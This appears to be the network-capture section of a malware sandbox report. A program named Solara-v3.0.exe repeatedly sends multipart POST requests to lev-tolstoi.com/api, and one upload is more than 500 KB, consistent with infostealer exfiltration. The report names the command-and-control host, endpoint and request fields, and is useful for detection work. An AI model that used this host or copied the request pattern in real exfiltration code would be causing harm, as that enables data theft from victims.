                                                                                                                                                                                                                                            2024-12-28 01:55:05 UTC1369INData Raw: 32 63 36 64 0d 0a 79 49 4a 35 42 79 70 64 39 7a 4f 34 69 4f 7a 7a 38 36 55 47 56 54 48 39 66 4d 79 36 72 50 49 35 55 51 52 52 6a 56 68 59 55 38 4b 51 67 33 77 4b 41 31 6a 57 50 2f 44 41 38 57 70 4b 63 41 4d 30 5a 50 78 35 66 44 2b 49 2f 77 30 51 57 58 58 30 4e 56 51 69 2b 2b 33 62 59 54 39 4c 4c 63 39 54 54 63 7a 4d 6b 6b 2f 56 61 32 46 39 77 54 31 51 79 36 79 76 4a 56 42 41 42 46 67 4a 62 41 4b 66 74 49 4e 5a 42 6c 49 52 72 33 4b 52 7a 66 33 58 73 34 30 71 53 52 48 31 63 4e 6d 47 33 4f 6f 42 62 51 56 70 78 51 41 52 49 38 4f 34 67 77 45 48 56 78 79 47 65 37 44 42 74 5a 2b 75 46 4a 4f 34 59 4c 67 70 6d 49 61 63 4c 78 56 59 47 44 48 39 59 57 55 62 6f 78 53 44 51 51 61 32 4b 63 35 53 71 61 7a 74 52 72 37 55 55 78 77 6b 35 51 6b 38 32 34 79 44 4a 55 6b 4e 69
                                                                                                                                                                                                                                            Data Ascii: 2c6dyIJ5Bypd9zO4iOzz86UGVTH9fMy6rPI5UQRRjVhYU8KQg3wKA1jWP/DA8WpKcAM0ZPx5fD+I/w0QWXX0NVQi++3bYT9LLc9TTczMkk/Va2F9wT1Qy6yvJVBABFgJbAKftINZBlIRr3KRzf3Xs40qSRH1cNmG3OoBbQVpxQARI8O4gwEHVxyGe7DBtZ+uFJO4YLgpmIacLxVYGDH9YWUboxSDQQa2Kc5SqaztRr7UUxwk5Qk824yDJUkNi
                                                                                                                                                                                                                                            2024-12-28 01:55:05 UTC1369INData Raw: 54 2b 76 48 4c 59 57 64 4b 44 4d 4a 37 34 4e 58 68 79 72 2f 77 6b 2f 6a 67 6d 43 47 41 6e 39 54 4c 42 44 53 39 36 45 43 5a 6f 45 37 50 79 62 70 38 58 67 34 52 39 7a 4f 56 7a 49 31 33 73 38 31 72 2f 55 57 67 58 49 57 6d 6c 45 4d 31 4d 44 30 73 6e 43 52 73 68 76 76 74 68 6a 68 47 46 79 33 79 69 33 42 49 37 4b 75 79 39 57 70 68 4e 5a 6b 39 6c 49 4b 56 39 6e 68 42 61 47 57 4a 50 42 6c 53 76 73 6e 6e 59 46 39 4b 63 59 63 4b 71 49 54 73 38 37 50 77 5a 30 67 30 75 44 48 63 79 6f 68 76 77 5a 51 39 4c 4d 41 35 47 43 37 7a 64 59 34 6b 4c 72 50 6f 6d 6a 2b 51 39 66 48 4b 39 2b 31 53 41 45 47 68 58 57 48 47 74 5a 66 45 4d 51 56 52 78 51 42 59 7a 73 2f 4a 75 6e 78 65 44 69 52 53 43 37 54 4a 74 64 4b 47 33 4f 38 4d 4f 49 6b 38 76 63 65 4e 6c 6c 68 42 50 44 44 55 4a 46
                                                                                                                                                                                                                                            Data Ascii: T+vHLYWdKDMJ74NXhyr/wk/jgmCGAn9TLBDS96ECZoE7Pybp8Xg4R9zOVzI13s81r/UWgXIWmlEM1MD0snCRshvvthjhGFy3yi3BI7Kuy9WphNZk9lIKV9nhBaGWJPBlSvsnnYF9KcYcKqITs87PwZ0g0uDHcyohvwZQ9LMA5GC7zdY4kLrPomj+Q9fHK9+1SAEGhXWHGtZfEMQVRxQBYzs/JunxeDiRSC7TJtdKG3O8MOIk8vceNllhBPDDUJF


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            3192.168.2.549711104.21.66.864435668C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-28 01:55:06 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=YGVW96CC
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 12779
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-28 01:55:06 UTC12779OUTData Raw: 2d 2d 59 47 56 57 39 36 43 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 38 30 33 30 41 36 43 42 41 31 33 37 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 59 47 56 57 39 36 43 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 47 56 57 39 36 43 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 59 47 56 57 39 36 43 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                                                                                                                                                            Data Ascii: --YGVW96CCContent-Disposition: form-data; name="hwid"E38030A6CBA13717BCFD68B774EF9B7A--YGVW96CCContent-Disposition: form-data; name="pid"2--YGVW96CCContent-Disposition: form-data; name="lid"yau6Na--899083440--YGVW96CCContent-Disp
                                                                                                                                                                                                                                            2024-12-28 01:55:07 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:07 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=r141mppk5ouo2o37vcgpdgf2i5; expires=Tue, 22 Apr 2025 19:41:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Euu3o81TpI9%2FAmMlASoGGufPwcQNOqXxLHGqTcHMy5KU3ap%2B%2FZJEJpGDTPwi%2FwBN%2FrxOuCsI7zXd7hGczwD10TE97PvH7x0Ok9la61W7Ffj13u6dIsNQmF%2FrAGe2HIM6GA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded1fef3642e8-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2013&rtt_var=767&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13708&delivery_rate=1416787&cwnd=250&unsent_bytes=0&cid=a4de61e357d8cc10&ts=958&x=0"
                                                                                                                                                                                                                                            2024-12-28 01:55:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-28 01:55:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            4192.168.2.549712104.21.66.864435668C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-28 01:55:08 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=G5YA9UVL8817
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 15045
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-28 01:55:08 UTC15045OUTData Raw: 2d 2d 47 35 59 41 39 55 56 4c 38 38 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 38 30 33 30 41 36 43 42 41 31 33 37 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 47 35 59 41 39 55 56 4c 38 38 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 35 59 41 39 55 56 4c 38 38 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 47 35 59 41 39 55 56 4c 38 38
                                                                                                                                                                                                                                            Data Ascii: --G5YA9UVL8817Content-Disposition: form-data; name="hwid"E38030A6CBA13717BCFD68B774EF9B7A--G5YA9UVL8817Content-Disposition: form-data; name="pid"2--G5YA9UVL8817Content-Disposition: form-data; name="lid"yau6Na--899083440--G5YA9UVL88
                                                                                                                                                                                                                                            2024-12-28 01:55:10 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:10 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=ckbrr1cjb4bm2di46atjqdvpcr; expires=Tue, 22 Apr 2025 19:41:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UfEuZ0stm116MUGJprIEphKK314judgtvTAVjfGC0ZzrcN89qxQn6WzeYSk7WvOUcBl%2BmVATRZRq1tfet2fIEHjzOp21ER2PcTgxSaQ6S8jEmed9KUwJBugXEn%2BItvk8m84%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded3139887277-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1868&min_rtt=1868&rtt_var=701&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2834&recv_bytes=15978&delivery_rate=1561497&cwnd=225&unsent_bytes=0&cid=0cedec2f22f674ca&ts=1351&x=0"
                                                                                                                                                                                                                                            2024-12-28 01:55:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-28 01:55:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            5192.168.2.549713104.21.66.864435668C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-28 01:55:11 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=3E8GBOWGO
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 20517
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-28 01:55:11 UTC15331OUTData Raw: 2d 2d 33 45 38 47 42 4f 57 47 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 38 30 33 30 41 36 43 42 41 31 33 37 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 33 45 38 47 42 4f 57 47 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 45 38 47 42 4f 57 47 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 33 45 38 47 42 4f 57 47 4f 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                                            Data Ascii: --3E8GBOWGOContent-Disposition: form-data; name="hwid"E38030A6CBA13717BCFD68B774EF9B7A--3E8GBOWGOContent-Disposition: form-data; name="pid"3--3E8GBOWGOContent-Disposition: form-data; name="lid"yau6Na--899083440--3E8GBOWGOContent-
                                                                                                                                                                                                                                            2024-12-28 01:55:11 UTC5186OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60
                                                                                                                                                                                                                                            Data Ascii: un 4F([:7s~X`nO`i`
                                                                                                                                                                                                                                            2024-12-28 01:55:12 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:12 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=tkhekq2t3n4092eo84s7hbjhn3; expires=Tue, 22 Apr 2025 19:41:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AUkEI5p%2FLzxa3qQyNZg4DQQ7P5PGPI7WZeWxAZuHk72ENIbjQ4vvlPUPj9q5JpUOoDbtpZDVLJhXErWFR%2FTlFuIDMRH8lllUYv4NQRqPboO95yPLZIeflbyuupd%2BU2H0PKE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded3fcd7242bd-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6450&min_rtt=1680&rtt_var=3624&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2834&recv_bytes=21469&delivery_rate=1738095&cwnd=196&unsent_bytes=0&cid=ef95ba06e725dac6&ts=904&x=0"
                                                                                                                                                                                                                                            2024-12-28 01:55:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-28 01:55:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            6192.168.2.549714104.21.66.864435668C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-28 01:55:14 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=6TP36CE1PS1S0XVX
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 1262
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-28 01:55:14 UTC1262OUTData Raw: 2d 2d 36 54 50 33 36 43 45 31 50 53 31 53 30 58 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 38 30 33 30 41 36 43 42 41 31 33 37 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 36 54 50 33 36 43 45 31 50 53 31 53 30 58 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 54 50 33 36 43 45 31 50 53 31 53 30 58 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a
                                                                                                                                                                                                                                            Data Ascii: --6TP36CE1PS1S0XVXContent-Disposition: form-data; name="hwid"E38030A6CBA13717BCFD68B774EF9B7A--6TP36CE1PS1S0XVXContent-Disposition: form-data; name="pid"1--6TP36CE1PS1S0XVXContent-Disposition: form-data; name="lid"yau6Na--899083440
                                                                                                                                                                                                                                            2024-12-28 01:55:15 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:14 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=p53cuko0tv6bo4sjngcsdjh3g1; expires=Tue, 22 Apr 2025 19:41:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vJaXqQH0phhJ3a7k76eQg40%2FPmzQzLyhDps1gKf%2F2nd5PP9gV%2BgwwJ%2FwFWdL%2BlXxWbzUu4FlV892VXixHcfIQSkrVPFxf1Zhd0AJAq4mMoIc6nTp8I382vAMedGpn5n96s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded4f5ece41a9-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1603&rtt_var=617&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2176&delivery_rate=1752701&cwnd=209&unsent_bytes=0&cid=cfe03e2871278036&ts=815&x=0"
                                                                                                                                                                                                                                            2024-12-28 01:55:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-28 01:55:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            7192.168.2.549719104.21.66.864435668C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-28 01:55:16 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=4BTBIVQQDUXSJ
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 565698
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-28 01:55:16 UTC15331OUTData Raw: 2d 2d 34 42 54 42 49 56 51 51 44 55 58 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 38 30 33 30 41 36 43 42 41 31 33 37 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 34 42 54 42 49 56 51 51 44 55 58 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 42 54 42 49 56 51 51 44 55 58 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 34 42 54 42 49 56 51
                                                                                                                                                                                                                                            Data Ascii: --4BTBIVQQDUXSJContent-Disposition: form-data; name="hwid"E38030A6CBA13717BCFD68B774EF9B7A--4BTBIVQQDUXSJContent-Disposition: form-data; name="pid"1--4BTBIVQQDUXSJContent-Disposition: form-data; name="lid"yau6Na--899083440--4BTBIVQ
                                                                                                                                                                                                                                            2024-12-28 01:55:16 UTC15331OUTData Raw: b5 d5 f3 65 80 ec 31 6e b8 83 41 9c 4f d3 d3 42 c3 2a b7 04 41 21 c4 0d 3d c0 d4 18 e1 0c de db 70 52 04 8e 23 87 f9 f9 73 b4 ca a0 21 58 78 57 aa 4d ca bd 31 ec a0 d4 5b 2d 17 b5 8a 09 90 b9 36 7f 0c 54 ff fc fa f6 7d e2 60 c7 d5 2b f9 76 a3 7b bb 0d de 89 f2 96 fa ae ff df 66 c3 c0 5f 9b 0d b3 46 50 f0 e3 33 57 97 0b f9 7f e8 87 6a 9a 4a 9f ad 28 6d 77 6b 6f 7f 8d c7 1f 50 e6 ea dd 97 47 01 ed c9 5d 88 6d 40 77 74 fc b5 16 f8 fa 49 b8 04 2d 2b 4a 22 99 58 d5 67 26 40 fe 56 6b fe 59 27 f8 2e 4c 9c 1b dd 0f 8f 77 bc 72 4f ca 37 e1 8b 8b 13 76 d3 5b 9f 1d a8 57 b5 7a 09 50 96 20 1e 6f d9 0c c7 84 cd 3e a5 e4 2a 1a ea da 0b 51 34 25 94 f8 1c a0 da ce a5 00 61 92 3e 9a dd cb 0f 70 9e 46 c0 31 e6 d6 d7 87 00 5a 5b 34 ed f3 1f 97 98 29 71 50 8c 5b 21 75 29 27
                                                                                                                                                                                                                                            Data Ascii: e1nAOB*A!=pR#s!XxWM1[-6T}`+v{f_FP3WjJ(mwkoPG]m@wtI-+J"Xg&@VkY'.LwrO7v[WzP o>*Q4%a>pF1Z[4)qP[!u)'
                                                                                                                                                                                                                                            2024-12-28 01:55:16 UTC15331OUTData Raw: 1c ed 43 5f cb 86 a6 f2 ab b7 9f 75 84 05 d7 a3 65 ca 3d 9d 42 4a 06 59 73 96 43 bc e0 2f a7 7b bd 58 cb 66 ab 9a 5d 8c d3 47 10 d4 73 20 2b 82 f6 44 b4 56 07 22 b9 f5 a9 7b 56 d8 bb 8e a4 34 d4 9d 49 b7 0f 2b 0a de 2a eb ad a0 72 ff 09 f2 1f e3 e8 0e 0b 7d d0 dd b7 32 82 6e af 92 a1 eb f7 d6 6c cc f2 96 4c 36 97 a9 b3 a5 8e 0f f2 07 83 be da b1 16 72 3a e5 18 c1 e4 66 89 b2 c9 cf b6 43 0f 45 14 1e 30 34 90 70 dd 3a 15 aa 9e f2 15 d3 e2 38 bd be cf a4 5e 48 63 5e e5 61 61 db 0d 31 90 c3 6f e7 cb 80 b6 08 fd 3a 91 29 05 22 1f d6 fb 75 7b 35 65 e0 97 bd f9 ea ff da 79 3a df ca 80 d6 dd 78 29 f0 eb ac 52 41 1e 46 96 c5 97 ca 09 02 2d f2 7c 47 f2 bc 04 8d 44 1c 5a 9b 07 59 c8 9c bf 6e f3 db f9 9c e8 bd d2 fb 6f 4e ed 96 46 1c 5a 40 76 a8 cd 5c e2 d3 9f 56 6d
                                                                                                                                                                                                                                            Data Ascii: C_ue=BJYsC/{Xf]Gs +DV"{V4I+*r}2nlL6r:fCE04p:8^Hc^aa1o:)"u{5ey:x)RAF-|GDZYnoNFZ@v\Vm
